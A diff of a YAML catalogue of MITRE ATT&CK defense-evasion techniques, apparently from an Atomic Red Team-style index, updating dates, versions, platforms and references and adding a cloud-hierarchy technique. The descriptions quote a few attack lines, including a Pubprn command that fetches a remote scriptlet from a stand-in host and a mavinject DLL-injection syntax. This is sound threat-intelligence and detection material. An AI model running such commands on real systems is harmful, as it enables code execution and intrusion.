-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -476,20 +458,57 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1578.004:
@@ -518,7 +537,7 @@ defense-evasion:
         url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
         description: Google. (2019, October 7). Restoring and deleting persistent
           disk snapshots. Retrieved October 8, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-03-08T10:33:02.128Z'
       name: Revert Cloud Instance
       description: |-
         An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
@@ -545,8 +564,6 @@ defense-evasion:
       - 'Instance: Instance Modification'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1564.012:
     technique:
@@ -588,7 +605,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1222.002:
     technique:
@@ -666,7 +682,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222.002
     atomic_tests: []
   T1216.001:
@@ -703,7 +718,7 @@ defense-evasion:
         Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second <code>script:</code> parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is <code>pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct</code>. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
 
         In later versions of Windows (10+), <code>PubPrn.vbs</code> has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to <code>LDAP://</code>, vice the <code>script:</code> moniker which could be used to reference remote code via HTTP(S).
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-18T14:55:35.817Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Signed Script Proxy Execution: Pubprn'
       x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -722,7 +737,6 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1216.001
     atomic_tests: []
   T1574.007:
@@ -812,7 +826,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1006:
     technique:
@@ -870,12 +883,87 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1006
     atomic_tests: []
+  T1666:
+    technique:
+      modified: '2024-09-25T16:15:41.224Z'
+      name: Modify Cloud Resource Hierarchy
+      description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+        (IaaS) environments in order to evade defenses.  \n\nIaaS environments often
+        group resources into a hierarchy, enabling improved resource management and
+        application of policies to relevant groups. Hierarchical structures differ
+        among cloud providers. For example, in AWS environments, multiple accounts
+        can be grouped under a single organization, while in Azure environments, multiple
+        subscriptions can be grouped under a single management group.(Citation: AWS
+        Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+        delete, or otherwise modify resource groups within an IaaS hierarchy. For
+        example, in Azure environments, an adversary who has gained access to a Global
+        Administrator account may create new subscriptions in which to deploy resources.
+        They may also engage in subscription hijacking by transferring an existing
+        pay-as-you-go subscription from a victim tenant to an adversary-controlled
+        tenant. This will allow the adversary to use the victim’s compute resources
+        without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+        2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+        adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+        API, causing the account to be severed from the AWS Organization to which
+        it was tied and removing any Service Control Policies, guardrails, or restrictions
+        imposed upon it by its former Organization. Alternatively, adversaries may
+        call the `CreateAccount` API in order to create a new account within an AWS
+        Organization. This account will use the same payment methods registered to
+        the payment account but may not be subject to existing detections or Service
+        Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Modification'
+      type: attack-pattern
+      id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+      created: '2024-09-25T14:16:19.234Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1666
+        external_id: T1666
+      - source_name: AWS Organizations
+        description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+          Retrieved September 25, 2024.
+        url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+      - source_name: Microsoft Subscription Hijacking 2022
+        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+      - source_name: Microsoft Azure Resources
+        description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+          effectively. Retrieved September 25, 2024.
+        url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+      - source_name: Microsoft Peach Sandstorm 2023
+        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+          password spray campaigns enable intelligence collection at high-value targets.
+          Retrieved September 18, 2023.
+        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.008:
     technique:
-      modified: '2023-10-16T16:41:53.957Z'
+      modified: '2024-10-15T15:56:27.592Z'
       name: 'Hide Artifacts: Email Hiding Rules'
       description: |-
         Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
@@ -901,11 +989,10 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
       - Linux
       - macOS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -950,12 +1037,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.008
     atomic_tests: []
   T1027.013:
     technique:
-      modified: '2024-04-19T04:03:07.164Z'
+      modified: '2024-10-15T16:32:45.108Z'
       name: Encrypted/Encoded File
       description: "Adversaries may encrypt or encode files to obfuscate strings,
         bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1026,11 +1112,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:50.568Z'
       name: Rootkit
       description: "Adversaries may use rootkits to hide the presence of programs,
         files, network connections, services, drivers, and other system components.
@@ -1098,7 +1183,6 @@ defense-evasion:
         url: https://en.wikipedia.org/wiki/Rootkit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1014
     atomic_tests: []
   T1036.007:
@@ -1129,7 +1213,7 @@ defense-evasion:
         url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
         description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
           with double extension?. Retrieved July 27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-14T21:09:59.588Z'
       name: 'Masquerading: Double File Extension'
       description: "Adversaries may abuse a double extension in the filename as a
         means of masquerading the true file type. A file name may include a secondary
@@ -1166,13 +1250,11 @@ defense-evasion:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'File: File Metadata'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1036.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1273,7 +1355,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -1304,7 +1385,7 @@ defense-evasion:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -1338,13 +1419,11 @@ defense-evasion:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1578:
     technique:
-      modified: '2023-09-05T20:45:22.041Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Modify Cloud Compute Infrastructure
       description: |-
         An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -1396,12 +1475,11 @@ defense-evasion:
       - source_name: Mandiant M-Trends 2020
         description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
           2020.
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1542.001:
     technique:
@@ -1481,12 +1559,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1542.001
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1505,7 +1582,6 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -1519,7 +1595,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -1546,8 +1621,8 @@ defense-evasion:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1578,7 +1653,8 @@ defense-evasion:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1542.003:
@@ -1635,7 +1711,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1218.013:
     technique:
@@ -1688,7 +1763,7 @@ defense-evasion:
         PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER</code>). This command would
         inject an import table entry consisting of the specified DLL into the module
         at the given base address.(Citation: Mavinject Functionality Deconstructed)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T17:35:08.315Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Mavinject
       x_mitre_detection: |-
@@ -1704,11 +1779,10 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1036.005:
     technique:
-      modified: '2023-09-14T21:12:48.409Z'
+      modified: '2024-09-12T19:30:45.064Z'
       name: 'Masquerading: Match Legitimate Name or Location'
       description: |-
         Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1754,8 +1828,8 @@ defense-evasion:
         external_id: T1036.005
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Docker Images
         description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
         url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1765,9 +1839,8 @@ defense-evasion:
         url: https://www.elastic.co/blog/how-hunt-masquerade-ball
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036.005
     atomic_tests: []
   T1600:
@@ -1794,7 +1867,7 @@ defense-evasion:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T22:37:49.258Z'
       name: Weaken Encryption
       description: |-
         Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1818,8 +1891,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1036.008:
     technique:
@@ -1883,11 +1954,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564:
     technique:
-      modified: '2024-03-29T17:45:48.126Z'
+      modified: '2024-10-15T15:58:49.815Z'
       name: Hide Artifacts
       description: |-
         Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1908,8 +1978,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'File: File Metadata'
       - 'Application Log: Application Log Content'
@@ -1953,12 +2023,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -1978,9 +2047,14 @@ defense-evasion:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -2000,9 +2074,8 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -2019,6 +2092,10 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2052,7 +2129,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1562.009:
@@ -2102,7 +2178,7 @@ defense-evasion:
         url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
         description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
           30, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-31T14:51:47.352Z'
       name: 'Impair Defenses: Safe Boot Mode'
       description: |-
         Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2130,8 +2206,6 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1562.009
     atomic_tests: []
   T1542.005:
@@ -2174,7 +2248,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
           Information. Retrieved October 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T16:35:53.806Z'
       name: TFTP Boot
       description: |-
         Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2198,12 +2272,10 @@ defense-evasion:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1497.001:
     technique:
-      modified: '2024-04-19T12:49:40.919Z'
+      modified: '2024-09-12T15:50:18.047Z'
       name: 'Virtualization/Sandbox Evasion: System Checks'
       description: "Adversaries may employ various system checks to detect and avoid
         virtualization and analysis environments. This may include changing behaviors
@@ -2293,13 +2365,12 @@ defense-evasion:
         url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
       - source_name: Deloitte Environment Awareness
         description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1497.001
     atomic_tests: []
   T1070.002:
@@ -2323,7 +2394,7 @@ defense-evasion:
         url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
         description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
           be Monitoring. Retrieved March 29, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T21:23:51.886Z'
       name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
       description: |
